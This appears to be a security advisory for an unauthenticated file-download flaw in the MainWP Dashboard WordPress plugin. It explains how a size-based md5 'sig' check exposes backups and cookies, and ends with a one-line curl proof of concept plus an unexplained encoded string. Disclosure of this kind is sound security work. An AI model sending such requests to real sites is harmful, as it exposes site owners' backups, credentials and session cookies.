MainWP Dashboard [Unauthenticated Local File Download]

Description

Plugin MainWP Dashboard allows to anyone to download files under wp-content/uploads/mainwp without authentication.

Files stored under that location contain sensitive information like cookies or DB and files backup.

Upon WordPress initialization plugin calls method MainWP_System::parse_init(), this method checks if various $_GET params are set and if they are it performs a series of predefined actions. Because this method is called whenever WordPress is initialized this actions are available to unauthenticated users also.

To download a file the attacker must know the relative to wp-content/uploads/mainwp directory path and the exact size of the file he is interested in. This is mandatory because plugin checks the $_GET['sig'] var to see if it matches the actual md5 of the filesize.

Downloading a file outside wp-content/uploads/mainwp doesn’t seem possible because plugin checks the path for double dots.

PoC

If the plugin is installed it should have created the file wp-content/uploads/mainwp/index.php which is 0 bytes. We can download it with the following request.

curl 'http://sbwp1.dev/?mwpdl=index.php&sig=cfcd208495d565ef66e7dff9f98764da'

INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX